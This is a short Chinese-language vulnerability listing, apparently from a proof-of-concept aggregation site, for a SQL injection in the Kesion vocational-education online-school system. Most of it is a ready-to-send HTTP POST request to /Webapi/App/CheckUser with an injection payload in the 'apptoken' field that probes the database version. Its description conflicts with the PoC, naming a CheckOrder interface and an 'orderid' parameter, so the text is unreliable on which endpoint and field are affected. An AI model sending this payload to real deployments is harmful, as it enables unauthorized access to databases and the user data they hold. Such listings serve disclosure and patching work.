科汛软件有限公司 科汛新职教网校系统 /Webapi/App/CheckUser SQL 注入漏洞

日期: 2025-10-17 | 影响软件: 科汛新职教网校系统 | POC: 已公开

漏洞描述

CheckOrder接口对用户输入的 orderid参数未做严格的安全过滤和校验,攻击者可以提交恶意的SQL代码(Payload)作为参数的一部分,这些代码被直接拼接到SQL语句中执行,从而破坏原有查询逻辑,并执行攻击者设定的恶意操作

PoC代码

POST /Webapi/App/CheckUser HTTP/1.1
Host: 
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: keep-alive
Content-Length: 70
Content-Type: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/[REDACTED] Safari/537.36
X-Requested-With: XMLHttpRequest

{
    "userid": "-12345",
    "apptoken": "1'and 1=1/@@version--"
}

相关漏洞推荐